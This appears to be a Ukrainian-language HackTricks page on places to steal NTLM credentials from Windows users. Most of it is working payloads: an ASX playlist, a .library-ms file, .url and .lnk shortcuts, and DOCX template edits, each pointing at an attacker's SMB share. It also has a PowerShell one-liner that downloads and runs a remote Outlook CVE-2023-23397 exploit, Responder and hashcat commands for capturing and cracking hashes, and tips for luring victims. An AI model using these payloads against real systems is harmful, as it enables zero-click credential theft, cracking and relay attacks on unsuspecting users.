Місця для steal NTLM creds
Reading time: 6 minutes
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.
Перегляньте всі чудові ідеї з https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ — від завантаження microsoft word файлу онлайн до джерела ntlm leaks: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md і https://github.com/p0dalirius/windows-coerced-authentication-methods
Windows Media Player playlists (.ASX/.WAX)
Якщо ви зможете змусити ціль відкрити або переглянути Windows Media Player playlist, яким ви керуєте, ви можете leak Net‑NTLMv2, вказавши елемент на UNC path. WMP спробує отримати вказане медіа через SMB і аутентифікується неявно.
Приклад payload:
<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>
Потік збору та cracking:
# Capture the authentication
sudo Responder -I <iface>
# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
Вбудований у ZIP .library-ms NTLM leak (CVE-2025-24071/24055)
Windows Explorer неналежним чином обробляє файли .library-ms, коли їх відкривають безпосередньо з ZIP-архіву. Якщо визначення бібліотеки вказує на віддалений UNC-шлях (наприклад, \attacker\share), просте перегортання/запуск .library-ms всередині ZIP змушує Explorer перелічити цей UNC і надіслати NTLM-аутентифікацію зловмиснику. В результаті отримується NetNTLMv2, який можна зламати офлайн або потенційно ретрансльовати.
Мінімальний .library-ms, який вказує на UNC зловмисника
<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>
Операційні кроки
- Створіть файл .library-ms з наведеним вище XML (вкажіть ваш IP/hostname).
- Заархівуйте його (on Windows: Send to → Compressed (zipped) folder) і доставте ZIP до цілі.
- Запустіть NTLM capture listener і дочекайтеся, поки жертва відкриє .library-ms зсередини ZIP.
Outlook calendar reminder sound path (CVE-2023-23397) – zero‑click Net‑NTLMv2 leak
Microsoft Outlook for Windows обробляв розширену MAPI-властивість PidLidReminderFileParameter в елементах календаря. Якщо ця властивість вказує на UNC path (e.g., \attacker\share\alert.wav), Outlook звертався до SMB share при спрацьовуванні нагадування, що призводило до leak Net‑NTLMv2 користувача без будь‑якого кліка. Цю вразливість виправили 14 березня 2023 року, але вона все ще дуже актуальна для legacy/untouched fleets та для історичного incident response.
Quick exploitation with PowerShell (Outlook COM):
# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav
Сторона Listener:
sudo responder -I eth0 # or impacket-smbserver to observe connections
Notes
- Жертві потрібно, щоб Outlook for Windows був запущений тільки в момент спрацьовування нагадування.
- leak дає Net‑NTLMv2, придатний для offline cracking або relay (не pass‑the‑hash).
.LNK/.URL icon-based zero‑click NTLM leak (CVE‑2025‑50154 – bypass of CVE‑2025‑24054)
Windows Explorer автоматично відображає іконки ярликів. Останні дослідження показали, що навіть після квітневого патчу Microsoft 2025 для UNC‑icon shortcuts все ще можна було спровокувати NTLM аутентифікацію без кліків, розмістивши ціль ярлика на UNC‑шляху та зберігши іконку локально (обхід патчу отримав CVE‑2025‑50154). Простий перегляд папки змушує Explorer отримувати метадані з віддаленої цілі, відправляючи NTLM на атакуючий SMB server.
Minimal Internet Shortcut payload (.url):
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0
Payload для ярлика програми (.lnk) через PowerShell:
$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe" # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()
Ідеї доставки
- Помістіть ярлик у ZIP і підштовхніть жертву переглянути його.
- Помістіть ярлик у мережеву папку з правами запису, яку жертва відкриє.
- Поєднайте з іншими файлами-приманками в тій самій папці, щоб Explorer попередньо переглядав ці елементи.
Office remote template injection (.docx/.dotm) to coerce NTLM
Документи Office можуть посилатися на зовнішній шаблон. Якщо вказати вкладений шаблон як UNC path, відкриття документа спричинить аутентифікацію до SMB.
Мінімальні зміни в DOCX relationships (всередині word/):
- Відредагуйте word/settings.xml і додайте посилання на вкладений шаблон:
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
- Відредагуйте word/_rels/settings.xml.rels і вкажіть rId1337 на ваш UNC:
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
- Перепакуйте в .docx і доставте. Запустіть SMB capture listener і чекайте на відкриття.
Після захоплення: ідеї щодо relaying або зловживання NTLM див.:
Посилання
- HTB Fluffy – ZIP .library‑ms auth leak (CVE‑2025‑24071/24055) → GenericWrite → AD CS ESC16 to DA (0xdf)
- HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM
- Morphisec – 5 NTLM vulnerabilities: Unpatched privilege escalation threats in Microsoft
- MSRC – Microsoft mitigates Outlook EoP (CVE‑2023‑23397) and explains the NTLM leak via PidLidReminderFileParameter
- Cymulate – Zero‑click, one NTLM: Microsoft security patch bypass (CVE‑2025‑50154)
tip
Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Вивчайте та практикуйте Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Підтримайте HackTricks
- Перевірте плани підписки!
- Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами в Twitter 🐦 @hacktricks_live.
- Діліться хакерськими трюками, надсилаючи PR до HackTricks та HackTricks Cloud репозиторіїв на github.